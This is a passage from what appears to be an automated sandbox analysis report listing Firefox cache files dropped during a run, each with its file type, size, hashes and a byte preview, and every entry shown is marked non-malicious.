                                                                                                                                                                                  Preview:............e...e...F.A.e...........a,~1708514993,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeB

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\4C863284CDA7F859EB300BED16DBCEF9517F1824

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):247
                                                                                                                                                                                  Entropy (8bit):5.045525157708332
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:6mUiBNlXDOLUxGbsH3X8sXWzdsDvLUxGHFOCVGsDpHHXmOy/l:6mUiBNpGbmX8Qudu8GcvupnCl
                                                                                                                                                                                  MD5:9C2AB02619313EFF482E7E2DF5A38203
                                                                                                                                                                                  SHA1:3A8B2D6A8A69C66201CFB338BA4227BD7FA6ED21
                                                                                                                                                                                  SHA-256:2E668772B40CED67265D769BF53FB37B88163452D7848CBED08FD1B7EBE56660
                                                                                                                                                                                  SHA-512:ACDE74F6D43F1970E80CB2A96DF857CEC1FC262C1513717F6E0309AAE041C77A810553815E9B92C380D992767C13C77CBCFCEFF78B210FE683B6FE47465FF779
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.;.C........e...e...F..........+....~predictor-origin,:https://www.youtube.com/.predictor::seen.1.predictor::resource-count.2.predictor::https://www.youtube.com/.1,6,1708515099,4096.predictor::https://fonts.googleapis.com/.1,1,1708515099,4096.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\4DC75AE7BE106203C668F4A8EAE4B1735CC9D518

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2928148480
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45836
                                                                                                                                                                                  Entropy (8bit):7.889969712591294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:XQjwuEDLNdnkuHplzB3AnWBhCiE4CgsmDe2tiryvAYEl7RKuFZrsb6gMp+tJP9MW:AjwBfP13zAyxXZiryC7RKawFQ+73OGr9
                                                                                                                                                                                  MD5:FE0AF762AE7E566C3D0A680291BF2F94
                                                                                                                                                                                  SHA1:E3EC2832A9B2C6EF39FBCD5873226979A8309FAD
                                                                                                                                                                                  SHA-256:B5ABBA911123955CA34F3D1B348E64138E3933A2D556043F411AFF37967AEF2A
                                                                                                                                                                                  SHA-512:2F50452725D7F7FE339804E4A4C8905748B13C7DBF6F3D93B40D04EBAEC61ECE13E16763ECF23DEA0E0B920FF3D42927442AC88580BBFCFD9C5906F82F701131
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........yW#..8.?..xz.......Ue..c.`..l.?.........>..%..P}..s.=........B..Pr>u...k...}w.r.9.....=..g.f.3.....s...9.=...h...oO.$..... s+.....]..%..Re.N..,T.Y....L.gyY.....S...kX.a..&+f.n.LMg...SSK.d.^.M..c.....q....9...d......pj8.X.DK.......v'...^..E_--..}~.(;r$.....G"u&RK...H5E.3..d..f>...Sb...3..i.<.b.on.O..,.1!...M......3._[.DB{4)..=.n.2.....0..q..}d.c.H.&.p.5..Fr...^j.o...zR.....V41._5...y.....5(...:Z4...[.>S..L..#%.c.e....S..w...Hww....Z,r.....N.?.$.Pp5Y....l.H.)..q.7....U./..V8.....Yj.'t...V...v6...].SV.a.o.3.-...>3S...;P3R.}....3.....d.......!.../...W39SP^...G....+7....d+3..... O.jK...b......X.....h...w6..W3.....>.....a.f...`d+3Ll.P.@"..~A..O..&tHX1..0-...b.....N\a8Z$..`3x.W......?6.._.....x..+X.q...h.WQ..{..ZC.FV...|....{...$D. .,......sb.KF......I.....R..u.....s..&6.;.0..O...nl.0 ..........rN'...[..^...9...T.J.x../..{*m>.../.._0..N.].F...]t..n....8.Tr..7.O..R....9..Z...[@...>.j~\.|.......D..StS.W.v....p+a.Yw.~..DN....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\5234C46D8C5DF0E8ED8FC71FBFB067BC611C3729

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2114256896
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12267
                                                                                                                                                                                  Entropy (8bit):6.5998870739564905
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ir1RbJtt5z8Eq4ezmYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CA:sVVZqFFmzwTWvoglJmzwTWvogrBHJm24
                                                                                                                                                                                  MD5:B65DCB41B8F9A98F86C0A39DFAD1501C
                                                                                                                                                                                  SHA1:E69060C9A7FE93D0C146516C8A8508A22F8C534E
                                                                                                                                                                                  SHA-256:12856292FA01901E64512909618EAC9B0319A0DE078BA5123FE756CF960381B9
                                                                                                                                                                                  SHA-512:11FED9C639728139E5D98E94D65B73028FBDABD830B2709D08FE922049606DE7BF44CC29E02850B7E718FB540DB956E974B4DD434B397143ABCA002C04E6B50E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........Vmo.6..._!..A.,.`.Y...4m..H[4+4..l.z..7p..wGY~k.....G...W..Z;..bi\...+..Eb..R.....iv.]........#.".&.3.....e..|i%....W....ey2.E...!.|.o..]...K.$.....6^._.......K~%|d..H...%.*7../4..v..J.E.9....W..x..j.p=o...Lg[.a.@.-..,o.bj..^{g_..j..%^>.^..j.{kMDW.>.&''.D,d.R0a...d..Q?..#.!!......_.D.C.Y./W..H...yB...!.x^.....#"ymDe.O.......|..^.|..x..P.7.........U..q..LQ..X...6................Q..:.l4.*_:.U.W.}......I.g.$iv...8!.H\.......Z.O.....pu...Z..x....9.Ot.....8.]n..........|_.DgS3..Ucq3..M..w.7I.Gx...w"Y...(..+..R.}ek~1\K..}..ku5lD.v....Ai?..K..y/.%..7Chk.'.7"....'..I.......7.....W.vN..s]..|..>..Y.....H.H.'.w.mE.(.*...&.D../....F...V..H.+..tt...U..)...#...#...H.....H......+..^.}..X..4...3Q..9.=O.].t0.x..g..(*..uW.>ro.CE._i...m..5I.j..m.g..D..Z_...~....Y....S.l....i...q..u\G.C.._..;....~...._...t.%.<.v>$...... .....i....4M.|.Y.:O..A..tT.].+,x_M.Gc..?].-....}...}9...E.L..'b..R.&..^./..i....\&y.....t...L..M.........^\=.~3n.m...2D.z.]k<..A.{..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\552D7E776EF97053734643ADC0C74EEAE5E0BE4C

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):107
                                                                                                                                                                                  Entropy (8bit):4.684426660975954
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:OllSI67QPPTvX3XDkDKVInGTKlVX8sX3u+llln:KoEXLXDk5nGbsHHl/n
                                                                                                                                                                                  MD5:8029B5A0740E60927132A86747B2FCC1
                                                                                                                                                                                  SHA1:F8E9330E0161E2AA94A7FBC28DA4A92CA8990C83
                                                                                                                                                                                  SHA-256:A71F2C3B823A71C64DDA40A06F065F66E104564729650E38D867E54FD7BDD343
                                                                                                                                                                                  SHA-512:893BCBA43382B85A63F6966F78246FA10CD5EC92182B6F89679134F58603662931BFFB8479D9666CC32FD0AE8B52D519B9471BCEB5DE883E55C3CC947F458999
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...I........e...e...F.+........0....~predictor-origin,:https://accounts.youtube.com/.predictor::seen.1.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\57D27CBCAB857481421F7322F1595A270C0FC474

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11650
                                                                                                                                                                                  Entropy (8bit):6.049119123409141
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:hFs3i3P0tQB78eyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWd+7Dmd+79:hFs3i3ctbeLYGBRohB1r1uk/KiFTaIdV
                                                                                                                                                                                  MD5:FDD46B8D3089E0893E15A34164A1410A
                                                                                                                                                                                  SHA1:D5D3BD3B72454C5257D8157E3325F17E7862304F
                                                                                                                                                                                  SHA-256:07F14CF52AD4F2A82702A4DFB21372F8B5F2925BEDA33999D24919C4D170E5FF
                                                                                                                                                                                  SHA-512:61D48F4FE55A7D9AF4FB41E6FE807483E978D19C4F12E9CDB0E12EA87B033BEF5174F969D5D5F7B03D151A8880A46AD68C1033770985D97E2505559A6AD937E8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","required":["url","order"],"properties":{"url":{"type":"string","title":"URL","description":"URL of the top site."},"order":{"type":"number","title":"Presentation order","description":"Presentation order of the top site."},"title":{"type":"string","title":"Title","description":"Title of the top site."},"exclude_locales":{"type":"array","items":{"type":"string","minLength":2},"title":"Exclude locales","minItems":0,"description":"List of locales to exclude (BCP 47 format, eg. \"de-AT\", \"fr-CA\").","uniqueItems":true},"exclude_regions":{"type":"array","items":{"type":"string","minLength":2},"title":"Exclude regions","minItems":0,"description":"List of regions to exclude (eg. \"FR\", \"CN\").","uniqueItems":true},"include_locales":{"type":"array","items":{"type":"string","minLength":2},"title":"Include locales","minItems":0,"description":"List of locales to include (BCP 47 format, eg. \"de-AT\", \"fr-CA\"). Set n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\58A756A796A86993036E1F0F79183245EE2ABF58

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13000
                                                                                                                                                                                  Entropy (8bit):6.043904617461632
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:HR3u9fiGLm4pUEE0M6dfrKcD/TaIdq6/9/x:UBi8mCUEE56dWcXa8q6Vp
                                                                                                                                                                                  MD5:5F1587BD253AEE5EAD95FD818AEF4883
                                                                                                                                                                                  SHA1:4B6A732272997892BD0DA61CF1ECFE8ACEDBF7F1
                                                                                                                                                                                  SHA-256:1D9C5816B9DEE4077B251AAE0C89AA162E2829116CF4BF3BB5AE289CE2D9E7B4
                                                                                                                                                                                  SHA-512:66187DAE2254D669286662DBFF837CCBAD92D388F8AF93B89152A6A39AC58315747598E0F0BCB5C3004369C761A12F0BCF6A65B9AE71A2876AF4EA36BD3E34DF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:-----BEGIN CERTIFICATE-----.MIIDBTCCAougAwIBAgIIF4NGAGgAoGAwCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYT.AlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3pp.bGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29u.dGVudCBTaWduaW5nIEludGVybWVkaWF0ZS9lbWFpbEFkZHJlc3M9Zm94c2VjQG1v.emlsbGEuY29tMB4XDTIzMDgxMDE1NTQxMloXDTIzMTAyOTE1NTQxMlowgakxCzAJ.BgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1Nb3VudGFp.biBWaWV3MRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMRcwFQYDVQQLEw5D.bG91ZCBTZXJ2aWNlczE2MDQGA1UEAxMtcmVtb3RlLXNldHRpbmdzLmNvbnRlbnQt.c2lnbmF0dXJlLm1vemlsbGEub3JnMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8.zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7Gffqygmqry.EGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEo4GD.MIGAMA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzAfBgNVHSME.GDAWgBSgHUoXT4zCKzVF8WPx2nBwp8744TA4BgNVHREEMTAvgi1yZW1vdGUtc2V0.dGluZ3MuY29udGVudC1zaWduYXR1cmUubW96aWxsYS5vcmcwCgYIKoZIzj0EAwMD.aAAwZQIxAKnhW7gpmEDAerMLSrR9kyCc82//G8dmfBsMJJxS6HNtZJi79sTvtm

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\5B1AB49B503A2B7BF5F43E87B95376BA939D0F13

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18351
                                                                                                                                                                                  Entropy (8bit):6.564546574451141
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:WFmsrJF7VqN4mApqN3Xo70tNo+pwPm082nyFz/hY4:W6ApQHkKo+pwPo20
                                                                                                                                                                                  MD5:718249B7D3CD70E38C5A19D1DEF019E6
                                                                                                                                                                                  SHA1:ACA42C083E6E1BAED430E371A9F5F8D00F724662
                                                                                                                                                                                  SHA-256:880C7828CAB97B040546078AD80E261D9BE49A6FE96956EF782B31BE276CA7A7
                                                                                                                                                                                  SHA-512:18C6F18C4A6B8D6EB0E780CE4833966D03F8811C43CA238D7992511420EDB870964B86B02BA117D0F1E0CDEB36ECF461FAA1B088F09469BDEF4C810BF35D7A89
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR..............F.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H................................................g.....pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^.....`IDATx...u.6........;@|......1@.X.I..e...$Y.u.....g..^ V..{/.O.i.$S..\....>....|..W.(...................................................................................'...3V...*...5.L.{ZS...k.......^C.z^...V.C?_u...q...h!.L...W....Y.....c../.*...8..."S.a..c....e..R4...).g.....O......!...q....CT...(.....=D..Ra).....W|.8X..:.*...f^C.o.....$.,.w..'..g...w.Y@.......um\v.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\5CAE04D59082EB89F53DE49CCAD03ABE2189E5CA

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8046
                                                                                                                                                                                  Entropy (8bit):6.040605419205688
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:WB6MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckcLUcucI:MxWebV2GZuZrFK0k0t7qW0NbZovEpR7
                                                                                                                                                                                  MD5:B024649BC8FE74B0A2B8B4647DB8DBF3
                                                                                                                                                                                  SHA1:6254A80EF12E13AA180E80A72BDF15E9613A0ACF
                                                                                                                                                                                  SHA-256:0A7B68BFE77A86B39DE515625C4ACE64CDBA04DB61A41FC1F6D50D370DB7C5F4
                                                                                                                                                                                  SHA-512:0CA9322656F9EE9D54B351945ED346ABDBF3F3690825334F31A113E29045CD62694169499E252851EB15B02550ED5AB30A4744A44A2E5EE554D4654E35C9F82D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:\.).........e...e...F.A.e......|....a,~1708514999,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/baseline/1/967d9d50-f397-49d3-8ec0-e15f2a105ac0.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8hs

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\61E7BECCAE8549715CA725B2D3E89C2E3234FA06

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12848
                                                                                                                                                                                  Entropy (8bit):6.019131239165607
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:8HVWJabcHeLYGBRohB1r1uk/KiFTaIdaHD:aWJabcHe8GvIDuuKOa8w
                                                                                                                                                                                  MD5:C060F2A40B616B0036624C9DEF4581B5
                                                                                                                                                                                  SHA1:D38B3FFC4CF456D997B5790A4C4BB6CDEABE0345
                                                                                                                                                                                  SHA-256:D8A6F70A53B90C56A99B5DF125DC44F412F33CA0848859A1A4E8EE69FBD5A457
                                                                                                                                                                                  SHA-512:7F9F170F372A3FB408145BD58CDF2AA40CBE4AF638ABC84066C5F523BFADDDDFA9BB2A4F788EFACA1D3BE3D882C835AE1456C34CD9063871E640F068E0AA1270
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","title":"Gfx","default":{"os":"","vendor":"","devices":[],"feature":"","hardware":"","driverVendor":"","driverVersion":"","featureStatus":"","windowProtocol":"","driverVersionMax":"","desktopEnvironment":"","driverVersionComparator":""},"required":["os","vendor","featureStatus"],"properties":{"os":{"enum":["","All","Android","Darwin 9","Darwin 10","Darwin 11","Darwin 12","Darwin 13","Darwin 14","Darwin 15","Darwin 16","Darwin 17","Darwin 18","Darwin 19","Darwin 20","Linux","WINNT 5.1","WINNT 5.2","WINNT 6.0","WINNT 6.1","WINNT 6.2","WINNT 6.3","WINNT 8.1","WINNT 10.0","Other"],"type":"string","title":"OS","description":"The operating system identifier."},"vendor":{"type":"string","title":"Vendor","description":"A vendor identifier, eg. 0x1002"},"blockID":{"type":"string","title":"Internal blocklist id","pattern":"^g[0-9]+$","description":"Original block id, eg. g28"},"details":{"type":"object","title":"Details"

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6246CB7FA0A72939616FB877FF3FE3BF71EBC1BB

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                  Entropy (8bit):4.680522047781059
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:4pqOwllZRtEtqiBMqEcldnX9XHWwrRzcSLYXqhHK//l:HNlTKiclpJWw9LYX2Kl
                                                                                                                                                                                  MD5:443F7AB19C3AF2A87FC04E037CD3CCEA
                                                                                                                                                                                  SHA1:E191165DEA7264BF984A3FEE526B708D32528924
                                                                                                                                                                                  SHA-256:9B98680185C873516C9A408EF8CACB468EC400971A923BF6C85F29C74BCC7E5F
                                                                                                                                                                                  SHA-512:0974F1E1A557305326767D715312CF6DCAEDC1AAE3C89C31F8BEB4D748B3FE4CCE4B4D8E5CE65E82ED5E96DF23B7F87FD096C091E45BB8FE624D76B0E127679F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:=...........e..................I....O^partitionKey=%28https%2Cfacebook.com%29,:https://www.facebook.com/video.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\65E0FFA59D21ADEE5C3AA36A5C3162271566AE23

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9550
                                                                                                                                                                                  Entropy (8bit):6.103099559930167
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:wcT83kB3meyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdps+dpss:zTKameLYGBRohB1r1uk/KiFTaIdaNl
                                                                                                                                                                                  MD5:0AD02F1561ACA48E3201FF1AC027AB4B
                                                                                                                                                                                  SHA1:4933E8CD39C93846D5530E0A123C86ADFCB663B0
                                                                                                                                                                                  SHA-256:52931AAA0895D8FED5BFDCC103C1BB5E0D99F5C2999563BEAF51CC68EC906EA0
                                                                                                                                                                                  SHA-512:730B9513971C0A68C9B77F04106E89DB826CCDE7F9F34CE9384682528183A9638391A73A7E9C9F1736FDC3E60F6915792B0CED22089A88A8A24302BA59D5672B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","properties":{"name":{"type":"string","title":"Name","description":"The name of the device (e.g. Nexus 5X, \u2026)"},"touch":{"type":"boolean","title":"Touch Screen","description":"Indicate if the device has touch capabilities"},"width":{"type":"integer","title":"Width","description":"The viewport width of the device"},"height":{"type":"integer","title":"Height","description":"The viewport height of the device"},"featured":{"type":"boolean","title":"Featured","description":"Whether or not the device will be displayed in Responsive Design devices list"},"userAgent":{"type":"string","title":"User Agent","description":"The user agent that will be applied when selecting the device"},"pixelRatio":{"type":"number","title":"DPR","description":"Pixel ratio of the device"}}},"signature":{"ref":"1u4ofa2gtcmvz2bdxfc0ezv6gq","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\672092B8D36D64EA59E40AC662BE04092C353FCC

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17271
                                                                                                                                                                                  Entropy (8bit):5.9481495283342
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:M7DhRTDa19teLYGBRohB1r1uk/KiFTaIdact:ehRPQe8GvIDuuKOa8N
                                                                                                                                                                                  MD5:631970C344B8C2E57B1A0C8537F5F167
                                                                                                                                                                                  SHA1:97B0E5E7E18D71AF360C4EAE0D60F6E56F424DA7
                                                                                                                                                                                  SHA-256:86B03708D429AFB318500E28B41791503528958A4D9E084ACA6EC8AAD8CE9D5E
                                                                                                                                                                                  SHA-512:F0726C554E95D0BD479897D15DB55387AB9314224282BF537941C9A8D5EF4C88A46BF370381E4D060CE076E83CFBD9CDC0586A98A7C9FFB9BBC5C2D935D5EE75
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","properties":{"attachment":{"type":"object","title":"The attachment itself","properties":{"hash":{"type":"string","title":"Hash"},"size":{"type":"number","title":"Size (bytes)"},"filename":{"type":"string","title":"Filename"},"location":{"type":"string","title":"URL"},"mimetype":{"type":"string","title":"MIME type"},"original":{"type":"object","title":"Pre-gzipped file","properties":{"hash":{"type":"string","title":"Hash"},"size":{"type":"number","title":"Size (bytes)"},"filename":{"type":"string","title":"Filename"},"mimetype":{"type":"string","title":"MIME type"}},"additionalProperties":false}},"description":"Information about the attached file.","additionalProperties":false}}},"signature":{"ref":"20crxvapq0ey22q46vbomp9qde","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"-fFx2lu100c4E7TZuWZw-cihVAUy2b6f

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\673B532D529AEA750EFE8A111B120929FBB39B92

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (8178)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):88440
                                                                                                                                                                                  Entropy (8bit):5.71507312271413
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:qgd6FF6U5v/FSisNk3a+awDbDit1/Wxm4oVxmb5EhI5iCHOa3s6J8MTN:qFs1/WxmAShI5rHds6J8MTN
                                                                                                                                                                                  MD5:C6E61EF115E174AB74B92BDC7B8D5C34
                                                                                                                                                                                  SHA1:13F44FFEF55F4A12D6E8F9CF74491176949C88B7
                                                                                                                                                                                  SHA-256:7BD5F38D7058CFC9A26C26489D97ACB0E1B20AB11F95DF85D39C5AD9FA82A8E2
                                                                                                                                                                                  SHA-512:782EFB93C16333BBA6C8FC2328600305F10F608D7A84B2A758CEBA4D3FA80CC7F8CC80322848B5D38BA61625B77B1592F66461325E247F2115629260A6562DE3
                                                                                                                                                                                  Malicious:false
